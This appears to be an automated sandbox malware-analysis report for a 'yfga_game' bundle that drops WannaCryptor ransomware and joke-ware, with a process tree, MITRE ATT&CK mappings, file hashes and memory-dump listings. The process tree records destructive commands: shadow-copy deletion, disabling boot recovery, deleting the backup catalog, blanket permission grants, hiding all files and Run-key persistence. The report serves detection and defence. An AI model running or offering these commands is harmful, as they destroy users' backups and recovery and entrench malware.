C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:3516

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
- Suspicious use of FindShellTrayWindow
PID:3680

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3716

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3760

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:3832

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:3900

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
PID:3928

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
PID:3996

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:4076

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:3140

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
PID:1880

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
PID:2576

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1100

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1380

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
PID:840

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
PID:2084

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2340

C:\Windows\SysWOW64\timeout.exe
timeout 5
3⤵
- Delays execution with timeout.exe
PID:2116

C:\Windows\SysWOW64\shutdown.exe
shutdown /a
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Windows\SysWOW64\timeout.exe
timeout 2
3⤵
- Delays execution with timeout.exe
PID:1800

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\win7recovery.exe
win7recovery.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- System policy modification
PID:2864

C:\ProgramData\WbVhxCIDDK.exe
"C:\ProgramData\WbVhxCIDDK.exe"
4⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1220

C:\Windows\SysWOW64\attrib.exe
attrib +h "C:\Users\Admin\*.* " /s /d
5⤵
- Views/modifies file attributes
PID:3752

C:\Windows\SysWOW64\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Windows\Start Menu\*.* " /s /d
5⤵
- Views/modifies file attributes
PID:3608

C:\Windows\SysWOW64\attrib.exe
attrib +h "C:\*.*" /s /d
5⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Views/modifies file attributes
PID:2024

C:\Windows\SysWOW64\attrib.exe
attrib +h "F:\*.*" /s /d
5⤵
- Views/modifies file attributes
PID:2072

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WScript.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\wannacryptor.exe
wannacryptor.exe
3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Sets desktop wallpaper using registry
PID:3300

C:\Windows\SysWOW64\attrib.exe
attrib +h .
4⤵
- Views/modifies file attributes
PID:3564

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
4⤵
- Modifies file permissions
PID:3576

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\taskdl.exe
taskdl.exe
4⤵
- Executes dropped EXE
PID:876

C:\Windows\SysWOW64\cmd.exe
cmd /c 23681721045231.bat
4⤵
PID:2780

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
5⤵
- Loads dropped DLL
PID:3212

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
4⤵
- Views/modifies file attributes
PID:3352

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected] co
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3200

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1588

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
4⤵
- Loads dropped DLL
PID:3204

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected] vs
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3220

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
6⤵
PID:2460

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
7⤵
- Interacts with shadow copies
PID:2840

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
7⤵
PID:332

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected]
4⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1916

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "exmpfvgynhzzzhy763" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\tasksche.exe\"" /f
4⤵
PID:2764

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "exmpfvgynhzzzhy763" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\tasksche.exe\"" /f
5⤵
- Adds Run key to start application
- Modifies registry key
PID:2304

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected]
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3352

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected]
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3960

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected]
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2208

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected]
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2172

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected]
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2776

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected]
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2504

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]
@[email protected]
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1608

C:\Windows\SysWOW64\timeout.exe
timeout 12
3⤵
- Delays execution with timeout.exe
PID:3312

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YouAreAnIdiot.exe
"C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YouAreAnIdiot.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 860
2⤵
- Loads dropped DLL
- Program crash
PID:1700

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YouAreAnIdiot.exe
"C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YouAreAnIdiot.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 860
2⤵
- Loads dropped DLL
- Program crash
PID:1484

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YouAreAnIdiot.exe
"C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YouAreAnIdiot.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 860
2⤵
- Loads dropped DLL
- Program crash
PID:1316

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\User Account Pictures\@[email protected]

Filesize
681B

MD5
aa335b07ab43a8e7c5210e4f4c82cddc

SHA1
81daa0d5ec5dfb4d7ef240bbe81b0f02e3849dea

SHA256
94f80cac8ae86dbbb8760dc2117563ebd1e1b11698852b5009b52059745492d1

SHA512
1c72f192a76cf066827e35c1d709a50279606e2fd046d147f85b33f44dcd0303b2f85fa7691483add1edb0b319126b129074cf80f061ffd34a50102cd8e44ac3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Adobe_Flash_Player.exe

Filesize
114B

MD5
d725d85cc5f30c0f695b03a9e7d0c4c0

SHA1
131b68adcddb7ff3b3ce9c34c5277eb5d673f610

SHA256
4d4588c42fa8df0ea45ad48aca4511bb4286f0deaa41fdf188c3b7ab9e1b698a

SHA512
01f270a15aa10e60e14ac140ccb54e38cf8e57833ef1c0db7d36688a93ecdc0a59ecf9ead9366a5920faac7e28a2e0ee03759eb0fa92d455abc72f406fe8775b

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
6.1MB

MD5
0136e5f4638479ad020624d31ae83e52

SHA1
7549d159f7096701dc6da4caeed0cb9157c7c6f8

SHA256
fa08508a0264dbfd07204c2e8fc7248e5c7f3e0d70f5af73653f1d401ce58252

SHA512
b7e81a0c94c844db2211376186feda093b1a153abd1571e39a62d09035bac22f27019cc4dc44596fa7872f0c02d96c034276e386063411fb2e2b87306507ef30

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\23681721045231.bat

Filesize
412B

MD5
1522413df6fa5a037b5d69e9cd40f755

SHA1
58d3f1fb0f224ede0f15cfffd3984497ba4f06a7

SHA256
36735105e867d8beae4a201c95afd895a4794f15fbb779a71bdb5471dbadd4f8

SHA512
0caf14897a32d3a28ececd6837a1cb4e10b6be1ffdc18ffd1cfaa5e72a5c823b048026691438bc90f5fb0e4ffa5036b3f0f206527d04487b3c71587b72f37521

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]

Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\IMPORTANT.txt

Filesize
273B

MD5
c538506cae8330844fd21a05f2d065aa

SHA1
02534de70d8ac6b5b700456a6f90b8f3b72b3cc0

SHA256
20cd2cf85675a5cfdcba4d355df959d71a9e1944888a7ecea7e3f7a16e8adbf9

SHA512
a2d8070c569d4e4091adc85d570603b0400aedac3da2fd3e18ee588d72b12f1183d27f205ada0fb74e004e89415274fa27e84574f498e2315132c91495fae123

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\TaskData\Tor\taskhsvc.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YFGA.bat

Filesize
2KB

MD5
643e1d4c3154c5dfe77e8c1f57e852a9

SHA1
719edadfa7323f4ed46f3a134485a4055017a040

SHA256
5675fb3256470cec0a9b5e1ca63aac7331803e3a31c2cc6d8d62a17687335378

SHA512
71ef9cf544459baa80e4a396ce7bcfabb8a6dc23076c861cca35180b9235590f29239eb964a4c374a99870c6f99db6aea946713332558a41c2903e4072ef66c6

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YouAreAnIdiot.exe

Filesize
424KB

MD5
e263c5b306480143855655233f76dc5a

SHA1
e7dcd6c23c72209ee5aa0890372de1ce52045815

SHA256
1f69810b8fe71e30a8738278adf09dd982f7de0ab9891d296ce7ea61b3fa4f69

SHA512
e95981eae02d0a8bf44493c64cca8b7e50023332e91d75164735a1d0e38138f358100c93633ff3a0652e1c12a5155cba77d81e01027422d7d5f71000eafb4113

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs

Filesize
50B

MD5
3167d161336cbd296dc579d2295b0f22

SHA1
53253e5841e6a7a7a1b8bd08378af0a96b2f9a98

SHA256
307879bf0d9bec07bab240b5010434801fbee520c99c5a617e8ac630f42dde80

SHA512
62af8fa0c9a30ec6aa9b552fcac1879af1f00f5ceb48a77718b2a8e042e3524e2cd299f26fcde31ad8abf2dcb94d15cf45ecbce0bd5f9f93f44aca6327aa53ea

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs

Filesize
44B

MD5
9a2ccbd3e2f1a2382fed7674c28dd086

SHA1
b466bdd2079575c938de65285f02739143ecb170

SHA256
4519cd5997afce27129ef943f121972f7b0b34aa018e4dd408892fc5c39bb59e

SHA512
8929493211c17a8e99b908a8305dbebe2d96e1b54426e89ddba84c2010a86d7f6d0983080f29fa1ab7a0687d536c0546278b9fffe4560d84e4012f243f344d78

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy3.vbs

Filesize
56B

MD5
19cf22e8d63e787913b6617542211e19

SHA1
8c3d2f43025e5c4ef70e0c4d1f36692361f51b1f

SHA256
dbec312d736f8a56f94ace99986d95d4355ef644a2fd908da1ff4c8b0a003979

SHA512
8b9d192dd7f175e63aebcdfc8426876fa8bf3ae00d3cf10bb8fcf0d0c262b906de28784f5b97141f656e87bb548d343b8d5a127c06ecb407289e91f3fc199608

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\flasher.exe

Filesize
246KB

MD5
9254ca1da9ff8ad492ca5fa06ca181c6

SHA1
70fa62e6232eae52467d29cf1c1dacb8a7aeab90

SHA256
30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6

SHA512
a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\hydra.cmd

Filesize
47B

MD5
5e578014c7017a85ca32f0b7e5d7df7f

SHA1
c88d8e7179fcc070d4419be9f4d8647354c2f6ed

SHA256
a964a717e3c47cb7d274e98928ca1271377d0d76a8908448e1b70e63af4082ad

SHA512
7eb206b0cbc2a9b744246d8a83b2fccc70204c6e777b0fcbb838e63d477fe047d8827f3c0de823d55b9ab5cba2ab572ff3f543f76a3451fa81b31584cc767106

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\jokewarehydra.exe

Filesize
43KB

MD5
b2eca909a91e1946457a0b36eaf90930

SHA1
3200c4e4d0d4ece2b2aadb6939be59b91954bcfa

SHA256
0b6c0af51cde971b3e5f8aa204f8205418ab8c180b79a5ac1c11a6e0676f0f7c

SHA512
607d20e4a46932c7f4d9609ef9451e2303cd79e7c4778fe03f444e7dc800d6de7537fd2648c7c476b9f098588dc447e8c39d8b21cd528d002dfa513a19c6ebbf

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\reg.reg

Filesize
25KB

MD5
aebe09cd7095ec201dc8acc350443242

SHA1
df7337e051bd02e1fdd4005b63ed45b8ca3d9726

SHA256
405d47dca73a5d6180db42e90c35931047c666ed1f1d6fab5ead6110c2356cc7

SHA512
ffc658faf04fee47c1284d439a4c5b3931d2f9bcac9b40e36f59ad0ed4917f0252e639284f817ca84a6da57552f8e0fdf96936987c3f5cf689a537e42b47288d

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\screenscrew.exe

Filesize
111KB

MD5
e87a04c270f98bb6b5677cc789d1ad1d

SHA1
8c14cb338e23d4a82f6310d13b36729e543ff0ca

SHA256
e03520794f00fb39ef3cfff012f72a5d03c60f89de28dbe69016f6ed151b5338

SHA512
8784f4d42908e54ecedfb06b254992c63920f43a27903ccedd336daaeed346db44e1f40e7db971735da707b5b32206be1b1571bc0d6a2d6eb90bbf9d1f69de13

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\spam.bat

Filesize
158B

MD5
4af4ab45205580fecf659dd857522f6b

SHA1
78ec5ff7647ca56d8c8d72b4da551efa86e53675

SHA256
b997f3a0d79493418f3e9da03dd95aea6b45b8a8c454e8e7d1f06de3ad3e1111

SHA512
f77c7b4d034def85c363805fe625aefb4e461770418f9015d4d5241fb8d09707b9918d54e9b2cc35d06008097174cdda0bee9702466fe7e097014794fe4d77cb

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\win7recovery.exe

Filesize
467KB

MD5
ab65e866abc51f841465d19aba35fb14

SHA1
ec79f1f511a199291b0893bc866a788ceac19f6e

SHA256
2ac0ca4ffda10b1861dd4ae0c2f0131a6400214cb4f5fa33951f3062b784a755

SHA512
2474905f174635b236e5f6e8f8c497e44435c94edd02ec47d3440c9a216f6840d040e6acc5fe2ec301ada80467f6cf55225d6361c1e7c6c6c7edccb9e7b5a35e

Download Submit
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\wtf.PNG

Filesize
165KB

MD5
32073febd7354a8826b39f498bafd798

SHA1
9bb46e97ffe1070926948c3f567e6842e7787c3e

SHA256
f04378e355e197709c8991fc6412be1fc0bf9802a3ce98b892afac2e9e694812

SHA512
762c19b6de30d84e00f466bf270909798bde8e48d1e945023b005dacea5555324d07b2cf3714b0ad83a75653d09a8f9f7a1c643cb9e014cab95fc2b220c8fe95

Download Submit
C:\Users\Admin\Documents\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Default\Desktop\@[email protected]

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
\Users\Admin\AppData\Local\Temp\is-344P4.tmp\walliant.tmp

Filesize
2.5MB

MD5
62e5dbc52010c304c82ada0ac564eff9

SHA1
d911cb02fdaf79e7c35b863699d21ee7a0514116

SHA256
bd54ad7a25594dc823572d9b23a3490ff6b8b1742a75e368d110421ab08909b2

SHA512
b5d863ea38816c18f7778ef12ea4168ceb0dae67704c0d1d4a60b0237ca6e758c1dfc5c28d4fc9679b0159de25e56d5dfff8addacd7a9c52572674d90c424946

Download Submit
\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\AxInterop.ShockwaveFlashObjects.dll

Filesize
17KB

MD5
451112d955af4fe3c0d00f303d811d20

SHA1
1619c35078ba891091de6444099a69ef364e0c10

SHA256
0d57a706d4e10cca3aed49b341a651f29046f5ef1328878d616be93c3b4cbce9

SHA512
35357d2c4b8229ef9927fa37d85e22f3ae26606f577c4c4655b2126f0ecea4c69dae03043927207ca426cc3cd54fc3e72124369418932e04733a368c9316cf87

Download Submit
\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\calc.exe

Filesize
112KB

MD5
829e4805b0e12b383ee09abdc9e2dc3c

SHA1
5a272b7441328e09704b6d7eabdbd51b8858fde4

SHA256
37121ecb7c1e112b735bd21b0dfe3e526352ecb98c434c5f40e6a2a582380cdd

SHA512
356fe701e6788c9e4988ee5338c09170311c2013d6b72d7756b7ada5cda44114945f964668feb440d262fb1c0f9ca180549aafd532d169ceeadf435b9899c8f6

Download Submit
\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\walliant.exe

Filesize
5.0MB

MD5
929335d847f8265c0a8648dd6d593605

SHA1
0ff9acf1293ed8b313628269791d09e6413fca56

SHA256
6613acb18cb8bf501fba619f04f8298e5e633cb220c450212bbc9dd2bef9538d

SHA512
7c9a4d1bec430503cc355dc76955d341e001b06196d4b508cc35d64feb2e8ba30e824e7c3a11c27135d7d99801f45f62a5b558563b4c78f89f5d156a929063fd

Download Submit
memory/408-774-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/408-2079-0x0000000000400000-0x00000000004A4000-memory.dmp

Filesize
656KB

Download
memory/920-776-0x0000000000400000-0x000000000068E000-memory.dmp

Filesize
2.6MB

Download
memory/1480-773-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1480-2030-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1480-2084-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1480-2078-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1480-2043-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1588-2051-0x000000006F070000-0x000000006F28C000-memory.dmp

Filesize
2.1MB

Download
memory/1588-2047-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/1588-2027-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/1588-2026-0x00000000703C0000-0x00000000703E2000-memory.dmp

Filesize
136KB

Download
memory/1588-2075-0x000000006F070000-0x000000006F28C000-memory.dmp

Filesize
2.1MB

Download
memory/1588-2071-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/1588-2025-0x000000006F500000-0x000000006F582000-memory.dmp

Filesize
520KB

Download
memory/1588-2060-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/1588-2024-0x000000006F070000-0x000000006F28C000-memory.dmp

Filesize
2.1MB

Download
memory/1588-2052-0x000000006F500000-0x000000006F582000-memory.dmp

Filesize
520KB

Download
memory/1588-2049-0x0000000074EA0000-0x0000000074EBC000-memory.dmp

Filesize
112KB

Download
memory/1588-2050-0x000000006F590000-0x000000006F607000-memory.dmp

Filesize
476KB

Download
memory/1588-2053-0x00000000703C0000-0x00000000703E2000-memory.dmp

Filesize
136KB

Download
memory/1588-2048-0x000000006FAF0000-0x000000006FB72000-memory.dmp

Filesize
520KB

Download
memory/1588-2023-0x000000006FAF0000-0x000000006FB72000-memory.dmp

Filesize
520KB

Download
memory/1704-61-0x0000000000450000-0x000000000045A000-memory.dmp

Filesize
40KB

Download
memory/1704-58-0x0000000000BB0000-0x0000000000C22000-memory.dmp

Filesize
456KB

Download
memory/1724-69-0x0000000000E80000-0x0000000000EF2000-memory.dmp

Filesize
456KB

Download
memory/1796-123-0x0000000000390000-0x00000000003A0000-memory.dmp

Filesize
64KB

Download
memory/2144-50-0x0000000000460000-0x000000000046A000-memory.dmp

Filesize
40KB

Download
memory/2144-45-0x00000000745D0000-0x0000000074CBE000-memory.dmp

Filesize
6.9MB

Download
memory/2144-56-0x00000000745D0000-0x0000000074CBE000-memory.dmp

Filesize
6.9MB

Download
memory/2144-46-0x00000000745D0000-0x0000000074CBE000-memory.dmp

Filesize
6.9MB

Download
memory/2144-44-0x0000000000CD0000-0x0000000000D42000-memory.dmp

Filesize
456KB

Download
memory/2276-77-0x00000000745D0000-0x0000000074CBE000-memory.dmp

Filesize
6.9MB

Download
memory/2276-3-0x00000000745D0000-0x0000000074CBE000-memory.dmp

Filesize
6.9MB

Download
memory/2276-1-0x0000000000FF0000-0x000000000107C000-memory.dmp

Filesize
560KB

Download
memory/2276-0-0x00000000745DE000-0x00000000745DF000-memory.dmp

Filesize
4KB

Download
memory/2276-2-0x0000000000210000-0x0000000000234000-memory.dmp

Filesize
144KB

Download
memory/2276-2036-0x00000000745D0000-0x0000000074CBE000-memory.dmp

Filesize
6.9MB

Download
memory/2276-67-0x00000000745DE000-0x00000000745DF000-memory.dmp

Filesize
4KB

Download
memory/2296-117-0x0000000001340000-0x00000000013B2000-memory.dmp

Filesize
456KB

Download
memory/2296-143-0x0000000000510000-0x000000000051A000-memory.dmp

Filesize
40KB

Download
